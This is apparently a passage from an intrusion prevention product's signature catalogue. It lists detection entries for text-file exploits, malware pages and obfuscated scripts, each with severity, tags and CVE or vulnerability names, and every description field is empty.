File-Text_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041

About this situation: An attempt exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-02, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-730-5211
Vulnerability: DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
Description:
Back to top

File-Text_DNSChanger-Injected-Iframe

About this situation: An iframe tag associated with DNSChanger
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1107-5242
Last changed: sgpkg-ips-1107-5242
Vulnerability: GhostDNS
Description:
Back to top

File-Text_Document-Template-Injection

About this situation: A possibly malicious Word document file with references to external template detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Word, Windows not specific, Microsoft Word not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1038-5242
Vulnerability: File-Text_Document-Template-Injection
Description:
Back to top

File-Text_Double-Unescape-Evasion-Attempt-Detected

About this situation: Use of double unescape was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Description:
Back to top

File-Text_Downloader-Malware

About this situation: Downloader malware detected
Context: Text File Stream
Severity: 7
Tags: Unix, Any Hardware, Any Software, Unix not specific, Any Software not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Downloader-Malware
Description:
Back to top

File-Text_Ebcrypt-ActiveX-Arbitrary-File-Overwrite

About this situation: An attempt to exploit an Ebcrypt ActiveX Arbitrary File Overwrite Vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, ebCrypt, CVE2007, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-677-5211
Vulnerability: Ebcrypt-ActiveX-Arbitrary-File-Overwrite
Description:
Back to top

File-Text_eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow

About this situation: Buffer overflow exploit against the eCentrex VOIP Client Component ActiveX control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, eCentrex VOIP Client Component, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method

About this situation: Attempt to exploit a vulnerability in EDraw Office Viewer ActiveX component detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, EDraw Office Viewer, CVE2007, Windows not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method
Description:
Back to top

File-Text_EDraw-Office-Viewer-ActiveX-Control-Vulnerable-OpenWebFile-Method-Call

About this situation: A call to a vulnerable method in EDraw Office Viewer ActiveX control was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, EDraw Office Viewer, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: EDraw-Office-Viewer-OpenWebFile-Arbitrary-Program-Execution
Description:
Back to top

File-Text_EDraw-PDF-Viewer-Insecure-ActiveX-Method-CVE-2009-2169

About this situation: An attempt to exploit a vulnerability in EDraw PDF Viewer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EDraw PDF Viewer, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1788-5242
Last changed: sgpkg-ips-1788-5242
Vulnerability: EDraw-PDF-Viewer-Insecure-ActiveX-Method-CVE-2009-2169
Description:
Back to top

File-Text_EICAR-AntiVirus-Test-File

About this situation: Detected an EICAR antivirus test file
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-Text_EICAR-AntiVirus-Test2

About this situation: Detected an EICAR antivirus test file
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-Text_EK-Flash-Loader-Script

About this situation: Traffic resembling an Exploit Kit loading page was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-978-5242
Last changed: sgpkg-ips-978-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Text_Electron-Setasdefaultprotocolclient-Command-Injection

About this situation: An attempt to exploit a vulnerability in Electronjs Electron detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Electronjs Electron, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1042-5242
Vulnerability: Electron-Setasdefaultprotocolclient-Command-Injection
Description:
Back to top

File-Text_Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Electronic Arts Origin detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Electronic Arts Origin, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1174-5242
Vulnerability: Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution
Description:
Back to top

File-Text_Electronic-Arts-SnoopyCtrl-ActiveX-Control-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Electronic Arts SnoopyCtrl ActiveX Control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Electronic Arts SnoopyCtrl, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-630-5211
Vulnerability: Electronic-Arts-SnoopyCtrl-ActiveX-Control-ControlFile-Buffer-Overflow
Description:
Back to top

File-Text_ElectronJS-Exodus-Wallet-Remote-Code-Execution

About this situation: An ElectronJS Exodus Wallet Remote Code Execution Vulnerability
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Electronjs Electron, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Vulnerability: ElectronJS-Exodus-Wallet-Remote-Code-Execution
Description:
Back to top

File-Text_Elipse-E3-ActiveReports-ActiveX-Vulnerability

About this situation: An attempt to exploit a vulnerability in Elipse E3 ActiveReports detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Elipse E3 ActiveReports, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Elipse-E3-ActiveReports-ActiveX-Vulnerability
Description:
Back to top

File-Text_Embedded-ActiveX-Object-In-HTML

About this situation: Detected an embedded ActiveX object in HTML
Context: Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-631-5211
Vulnerability: Embedded-Object-In-HTML
Description:
Back to top

File-Text_Embedded-Assembly-Obvuscated-JavaScript

About this situation: Obfuscated JavaScript and Embedded Assembly detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-957-5242
Last changed: sgpkg-ips-957-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Embedded-Java-Applet-In-HTML

About this situation: Detected an embedded Java applet in HTML
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Embedded-Object-In-HTML
Description:
Back to top

File-Text_EMC-Captiva-PixTools-ActiveX-Control-File-Creation

About this situation: An attempt to exploit a vulnerability in EMC Captiva PixTools detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, EMC Captiva PixTools, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-552-5211
Vulnerability: EMC-Captiva-PixTools-Distributed-Imaging-ActiveX-Control-File-Creation
Description:
Back to top

File-Text_EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in EMC QuickScan Pro detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, EMC Captiva QuickScan Pro, EMC Documentum ApplicationXtender Desktop, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Emotet-Download-Page

About this situation: Emotet download page was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Vulnerability: Emotet-Download-Page
Description:
Back to top

File-Text_Encoded-Client-Side-Script

About this situation: Detected a file with encoded scripts
Context: Text File Stream
Severity: 1
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Protocol Information
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTML-Script-Detector
Description:
Back to top

File-Text_Encoded-JavaScript-Detected

About this situation: Encoded JavaScript Detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1092-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Encoded-VBScript

About this situation: Encoded VBScript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-947-5242
Last changed: sgpkg-ips-1349-5242
Description:
Back to top

File-Text_EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow

About this situation: Detected attempt to use vulnerable method of kwedit ActiveX component of EnjoySAP
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, EnjoySAP, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow

About this situation: Detected attempt to use vulnerable method of rfcguisink ActiveX component of EnjoySAP
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, EnjoySAP, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_EQGRP-installdate.pl

About this situation: A file associated with the Equation Group (EQGRP) was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-880-5242
Vulnerability: EQGRP-Tools
Description:
Back to top

File-Text_Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Electric Sheep Fencing pfSense detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-775-5211
Vulnerability: Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection
Description:
Back to top

File-Text_Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ESTSoft ALZip detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ESTSoft ALZip, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow
Description:
Back to top

File-Text_Eudora-Url-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Eudora detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Eudora, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-452-4333
Vulnerability: Eudora-Url-Handling-Buffer-Overflow
Description:
Back to top

File-Text_Excessively-Long-Asp-Include-File-Argument

About this situation: Detects an excessively long ASP include file argument
Context: Text File Stream
Severity: 7
Tags: Windows, x86, IIS, MS2006-07, CVE2006, Windows not specific, IIS not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-IIS-Server-Crafted-Asp-Page-Buffer-Overflow
Description:
Back to top

File-Text_Exiftool-DjVu-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in ExifTool Project ExifTool detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, ExifTool, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1353-5242
Vulnerability: Exiftool-DjVu-Remote-Code-Execution
Description:
Back to top

File-Text_Extremely-Obfuscated-Script-File

About this situation: Suspicious traffic detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1122-5242
Last changed: sgpkg-ips-1122-5242
Description:
Back to top

File-Text_F5-Big-IP-iControl-CSRF-File-Write-Soap-API

About this situation: An attempt to exploit a vulnerability in F5 Big-IP's iControl detected.
Context: Text File Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, F5 Networks BIG-IP, CVE2022, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Vulnerability: F5-Big-IP-iControl-CSRF-File-Write-Soap-API
Description:
Back to top

File-Text_F5-Big-IP-Next-Central-Manager-Login-SQL-Injection-CVE-2024-26026

About this situation: An attempt to exploit a vulnerability in F5 Networks BIG-IP Next Central Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP Next Central Manager, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1740-5242
Last changed: sgpkg-ips-1740-5242
Vulnerability: F5-Big-IP-Next-Central-Manager-Login-SQL-Injection-CVE-2024-26026
Description:
Back to top

File-Text_Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in the Facebook Photo Uploader ActiveX control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Facebook Photo Uploader, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: HTTP-Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF
Description:
Back to top

File-Text_Fallout-Exploit-Kit-Landing-Page

About this situation: Fallout Exploit Kit landing page was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-1102-5242
Last changed: sgpkg-ips-1130-5242
Vulnerability: Fallout-Exploit-Kit-Landing-Page
Description:
Back to top

File-Text_Filtering-Detection-Limit

About this situation: File detection limit
Context: Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description:
Back to top

File-Text_Firefox-Cookie-Site-Bondary-Bypass

About this situation: An attempt to exploit site boundary bypass vulnerability in Mozilla Firefox was detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2007, Any Operating System not specific, Potential Disclosure
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Firefox-Cookie-Site-Bondary-Bypass
Description:
Back to top

File-Text_Firefox-Executable-Image-Dragging-Vulnerability

About this situation: Executable file extension in HTML image file
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Mozilla Firefox, Mozilla Suite, Mozilla Thunderbird, CVE2005, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Firefox-Executable-Image-Dragging-Vulnerability
Description:
Back to top

File-Text_Firefox-JavaScript-Engine-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2006, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Firefox-JavaScript-Engine-Memory-Corruption
Description:
Back to top

File-Text_Firefox-MCallGetProperty-Write-Side-Effects-Use-After-Free-Exploit

About this situation: An attempt to exploit a vulnerability in Firefox detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2020, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1519-5242
Vulnerability: Firefox-MCallGetProperty-Write-Side-Effects-Use-After-Free-Exploit
Description:
Back to top

File-Text_Firefox-Plugin-Finder-JavaScript-Injection

About this situation: An attempt to exploit a vulnerability in Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2005, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1333-5242
Vulnerability: Firefox-Plugin-Finder-JavaScript-Injection
Description:
Back to top

File-Text_Firefox-SVG-JavaScript-Zoom-Memory-Corruption

About this situation: Javascript scaling function in embedded SVG image detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Firefox-SVG-JavaScript-Zoom-Memory-Corruption
Description:
Back to top

File-Text_Firefox-WYCIWYG-Cache-Manipulation

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-1333-5242
Vulnerability: Firefox-WYCIWYG-Cache-Manipulation
Description:
Back to top

File-Text_Flarum-Core-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Flarum detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Flarum, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1382-5242
Last changed: sgpkg-ips-1382-5242
Vulnerability: Flarum-Core-Cross-Site-Scripting
Description:
Back to top

File-Text_Flexera-InstallShield-ISGrid2.dll-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Flexera AdminStudio detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, Novell ZENworks AdminStudio, Flexera InstallShield, Flexera AdminStudio, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-677-5211
Vulnerability: Flexera-InstallShield-ISGrid2.dll-DoFindReplace-Heap-Buffer-Overflow
Description:
Back to top

File-Text_Flexera-Multiple-Products-Isgrid.dll-ActiveX-Control-Code-Execution

About this situation: An attempt to exploit a vulnerability in an ActiveX control
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks AdminStudio, Flexera InstallShield, Flexera AdminStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Flexera-Multiple-Products-Isgrid.dll-ActiveX-Control-Code-Execution
Description:
Back to top

File-Text_Fluentd-Oj-Parser-Insecure-Deserialization-CVE-2022-39379

About this situation: An attempt to exploit a vulnerability in Fluentd parser detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Fluentd, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1538-5242
Last changed: sgpkg-ips-1538-5242
Vulnerability: Fluentd-Oj-Parser-Insecure-Deserialization-CVE-2022-39379
Description:
Back to top

File-Text_Fortinet-FortiOS-Heap-Buffer-Overflow-CVE-2018-13383

About this situation: An attempt to exploit a vulnerability in FortiOS detected
Context: Text File Stream
Severity: 7
Tags: FortiOS, Any Hardware, CVE2018, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1426-5242
Last changed: sgpkg-ips-1426-5242
Vulnerability: Fortinet-FortiOS-Heap-Buffer-Overflow-CVE-2018-13383
Description:
Back to top

File-Text_Free-Online-PHP-Obfuscator-Code

About this situation: Obfuscated PHP detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-761-5211
Vulnerability: Free-Online-PHP-Obfuscator-Code
Description:
Back to top

File-Text_Freetype-Heap-Buffer-Overflow-CVE-2020-15999

About this situation: A base64 embedded attempt to exploit a vulnerability in Freetype font rendering library detected
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Chrome, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1291-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Freetype-Heap-Buffer-Overflow-CVE-2020-15999
Description:
Back to top

File-Text_Froxlor-Simexporter.php-Import-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Froxlor detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Froxlor, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1586-5242
Last changed: sgpkg-ips-1586-5242
Vulnerability: Froxlor-Simexporter.php-Import-Unrestricted-File-Upload
Description:
Back to top

File-Text_Galaxy-Store-Webview-Filter-Bypass-CVE-2023-21434

About this situation: An attempt to exploit a vulnerability in Galaxy Store detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Galaxy Store, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Galaxy-Store-Webview-Filter-Bypass-CVE-2023-21434
Description:
Back to top

File-Text_GE-Proficy-Historian-Keyhelp-ActiveX-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in General Electric Proficy Historian detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GE Proficy, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-475-5211
Last changed: sgpkg-ips-579-5211
Vulnerability: GE-Proficy-Historian-Keyhelp-ActiveX-Remote-Code-Execution
Description:
Back to top

File-Text_General-Server-Status-Stream

About this situation: Partial detection for an Apache Heap Buffer Overflow correlation.
Context: Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Apache, CVE2014, Any Operating System not specific, Apache not specific, Protocol Information
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: Apache-HTTP-Server-Mod_status-Heap-Buffer-Overflow
Description:
Back to top

File-Text_Generic-Cmd-Encoder

About this situation: Possible command line payload encoder
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-682-5211
Last changed: sgpkg-ips-682-5211
Description:
Back to top

File-Text_Generic-JavaScript-Obfuscator

About this situation: A generic JavaScript obfuscator detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-685-5211
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Generic-Shellcode-3

About this situation: Generic shellcode detection
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-998-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Text_Generic-Shellcode-Base64-Kernel32

About this situation: An encoded reference to kernel32.dll was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-788-5211
Last changed: sgpkg-ips-788-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Text_Generic-Shellcode-Hex-Encoded-Kernel32

About this situation: An encoded reference to kernel32.dll was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1259-5242
Last changed: sgpkg-ips-1259-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Text_Geovision-Livex-Directory-Traversal-Vulnerability

About this situation: An attempt to exploit a vulnerability in GeoVision LiveX detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GeoVision LiveX, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Vulnerability: Geovision-Livex-Directory-Traversal
Description:
Back to top

File-Text_Ghostscript-File-Command-Execution

About this situation: An attempt to exploit a vulnerability in Ghostscript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ghostscript, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: Ghostscript-Failed-Restore-Command-Execution-CVE-2018-16509
Description:
Back to top

File-Text_Ghostscript-Format-String-Exploitation-CVE-2024-29510

About this situation: An attempt to exploit a vulnerability in Ghostscript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ghostscript, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1750-5242
Last changed: sgpkg-ips-1750-5242
Vulnerability: Ghostscript-Format-String-Exploitation-CVE-2024-29510
Description:
Back to top

File-Text_Git-Source-Code-Management-Apply-Reject-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in Git detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Git, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1604-5242
Last changed: sgpkg-ips-1604-5242
